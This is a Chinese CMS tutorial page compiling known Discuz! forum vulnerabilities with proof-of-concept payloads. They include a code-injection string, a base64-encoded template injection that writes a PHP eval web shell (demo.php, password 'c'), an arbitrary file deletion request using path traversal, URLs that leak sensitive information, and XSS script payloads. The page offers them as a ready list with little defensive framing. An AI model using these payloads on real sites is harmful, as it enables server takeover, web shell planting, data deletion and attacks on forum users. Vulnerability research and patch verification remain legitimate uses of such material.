您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程

Discuz常见漏洞汇总

元柏2025-07-03Discuz教程已有人查阅

导读Discuz ML! V3.X 代码注入代码注入导致RCEDiscuz! X2.5 远程代码执行(1).注册任意账户(2).登陆用户,发表blog日志(注意是日志)(3).添加图片,选择网络图片

Discuz ML! V3.X 代码注入
Date
2019
类型
代码注入导致RCE
影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012
类型:
敏感信息泄露
影响范围:
DZ x2.5
POC:
http:// .xx.xx/uc_server/control/admin/db.php
http:// .xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http:// .xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
2012
类型:
RCE
前置条件:
(1).注册任意账户
(2).登陆用户,发表blog日志(注意是日志)
(3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).访问日志,论坛根目录下生成demo.php,一句发密码c
影响范围:
v2.5
Discuz!X2/2.5弱口令破解漏洞
Date:
2013
类型:
登录界面 破解
影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
2014
类型:
任意文件删除
前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10
类型:
前台任意文件删除
影响范围:
SSV-89024
Date:
2015.1
类型:
Discuz X2.5 /source/class/class_image.php 命令执行漏洞
影响范围:
Discuz X2.5
Discuz! X系列远程代码执行漏洞
Date:
2015.8
类型:
RCE + XML反序列化
前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3
类型:
SSRF
影响范围:
Discuz! X2 X3
POC:
http://www.ebingou.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8
类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析
Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script>
Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

本文标签:

很赞哦! ()

相关源码

  • (响应式)wordpress模板VieuV4.5主题资讯自媒体博客源码Vieu主题专注于个人博客与企业展示场景,采用响应式设计确保在手机、电脑、平板等多设备上的展示。主题集成会员中心、投稿系统、内容保护等实用功能,满足现代博客网站的建设需求。查看源码
  • (PC+WAP)绿色日志美文文学说说博客网站pbootcms模板除日志博客类网站外,通过替换图文内容可快速适配:心情日记分享平台、文学创作社区、朋友圈内容聚合站、美文鉴赏网站、读书笔记平台等应用场景。查看源码
  • (自适应)物流运输快递仓储货运网站模板免费下载基于PbootCMS内核开发的物流运输行业专用模板,深度适配仓储货运企业的业务展示需求。前端采用响应式布局,自动适配手机端访问,后台数据实时同步更新,帮助企业高效展示运输网络、仓储设施、服务流程等核心业务模块。查看源码
  • (PC+WAP)院校学院职业学校机构协会网站开源源码下载本模板基于PbootCMS系统开发,为高等院校、职业学校等教育机构设计,特别适合展示学校概况、院系设置、招生信息等内容。采用双端适配技术,确保在PC和移动设备上都能获得良好的浏览体验。查看源码
  • (自适应)品牌策划高端设计公司网站pbootcms模板免费下载本模板为品牌策划与设计公司打造,基于PbootCMS内核开发,充分考虑了创意设计行业的视觉展示需求。模板设计风格现代简约,布局合理清晰,呈现设计作品与专业服务,帮助设计公司展示创意实力并吸引潜在客户。查看源码
  • (带手机版)绿色生态农业种植农产品网站pbootcms源码下载本模板基于PbootCMS内核开发,为生态农业企业量身打造,适用于农业种植、有机农场、农产品电商等业务场景。模板设计充分体现绿色环保理念,突出农业特色,同时保持简洁大气的视觉效果,帮助农业企业建立专业形象。查看源码
分享笔记 (共有 篇笔记)
验证码:

本栏推荐